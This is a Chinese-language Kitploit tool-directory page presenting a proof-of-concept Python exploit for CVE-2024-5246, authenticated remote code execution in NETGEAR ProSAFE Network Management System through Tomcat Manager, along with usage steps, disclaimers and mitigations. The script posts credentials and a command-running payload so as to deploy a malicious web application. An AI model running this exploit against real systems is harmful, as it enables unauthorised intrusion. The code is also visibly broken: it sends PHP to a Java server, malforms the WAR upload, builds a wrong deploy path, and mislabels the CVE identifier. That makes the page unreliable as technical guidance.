Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-5246 — 概念验证 Python 脚本,演示通过部署恶意 Web 应用程序,利用存在漏洞的 Apache Tomcat,在 NETGEAR ProSAFE 网络管理系统中实现经过身份验证的远程代码执行。 | Kitploit
工具/GitHubGitHub/abdurahmon3236/cve-2024-5246
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubabdurahmon3236/cve-2024-5246

CVE-2024-5246

概念验证 Python 脚本,演示通过部署恶意 Web 应用程序,利用存在漏洞的 Apache Tomcat,在 NETGEAR ProSAFE 网络管理系统中实现经过身份验证的远程代码执行。

查看仓库
222年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

NETGEAR ProSAFE 网络管理系统远程代码执行(RCE)漏洞的概念验证(PoC)

本仓库包含一个概念验证(PoC)脚本,用于演示 NETGEAR ProSAFE 网络管理系统中的远程代码执行(RCE)漏洞。该漏洞是由于产品安装程序中使用了存在漏洞的 Apache Tomcat 版本所致。此问题允许经过身份验证的攻击者在受影响的安装上执行任意代码。

漏洞描述

CVE 编号: ZDI-CAN-22868

概述: NETGEAR ProSAFE 网络管理系统由于使用了存在漏洞的 Apache Tomcat 版本,存在远程代码执行漏洞。经过身份验证的攻击者可以利用此漏洞在受影响系统上以 SYSTEM 权限执行任意代码。

受影响版本:

  • 使用存在漏洞的 Apache Tomcat 版本的 NETGEAR ProSAFE 网络管理系统版本。

身份验证: 需要

PoC 详情

此 PoC 演示了攻击者如何利用该漏洞实现远程代码执行。具体缺陷在于产品安装程序使用了过时或存在漏洞的 Apache Tomcat 版本。

PoC 脚本

以下脚本说明了如何利用此 RCE 漏洞。在运行此 PoC 之前,请确保您拥有适当的权限。

重要: 此 PoC 仅用于教育目的,不得用于未经授权或恶意的活动。

root@kitploit:~
import requests

# Configuration
target_url = "http://target-ip:port/manager/html"  # Change this to the Tomcat Manager URL of the target
username = "admin"  # Change to the valid username
password = "password"  # Change to the valid password

# The payload to be executed on the remote server
payload = """
<?php
    // Payload to execute arbitrary PHP code
    system('whoami');
?>
"""

# Tomcat Manager URL path for deploying a new web application
deploy_url = f"{target_url}/deploy?path=/example&update=true"

# Headers for authentication
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

def exploit_rce(url, username, password, payload):
    """
    Exploit the RCE vulnerability by deploying a malicious web application.

    Args:
        url (str): The Tomcat Manager URL.
        username (str): The Tomcat Manager username.
        password (str): The Tomcat Manager password.
        payload (str): The malicious payload to be executed.
    """
    try:
        # Create a new web application with the malicious payload
        response = requests.post(
            url,
            headers=headers,
            data={
                "path": "/example",
                "war": f"<form method='post' enctype='multipart/form-data'><input type='file' name='file' value='{payload}'/></form>"
            },
            auth=(username, password)
        )
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200 and "Deployed application" in response.text:
            print("[+] Successfully deployed the malicious web application.")
        else:
            print("[-] Failed to deploy the malicious web application.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Exploiting RCE vulnerability at: {deploy_url}")
    exploit_rce(deploy_url, username, password, payload)

说明

  1. 配置: 将 target_url 设置为目标系统的 Tomcat Manager URL,并更新 username 和 password 为有效凭据。
  2. 有效载荷: 有效载荷是一个简单的 PHP 脚本,用于执行系统命令以演示代码执行。
  3. 利用函数: exploit_rce() 函数发送 POST 请求以部署恶意 Web 应用程序。
  4. 部署: 脚本尝试部署包含恶意有效载荷的新 Web 应用程序并打印结果。

重要注意事项

  • 权限: 确保您拥有在目标系统上测试此漏洞的明确权限。未经授权的测试是非法的且不道德。
  • 测试环境: 在受控环境中进行测试,以避免影响生产系统。
  • 道德使用: 负责任地使用此 PoC,仅用于授权场景。

缓解措施

为缓解此漏洞,请采取以下步骤:

  1. 更新 Tomcat: 升级到已修补漏洞的 Apache Tomcat 版本。
  2. 安全访问: 确保 Tomcat Manager 和其他敏感接口受到保护,仅授权用户可访问。
  3. 审查配置: 定期审查并加固 Web 应用程序和服务器的配置。

通过遵循这些步骤,您可以解决 NETGEAR ProSAFE 网络管理系统中的 RCE 漏洞并增强整体安全性。


此 README.md 提供了 RCE 漏洞的详细描述和 PoC 脚本,包括设置说明、注意事项和缓解建议。

下载工具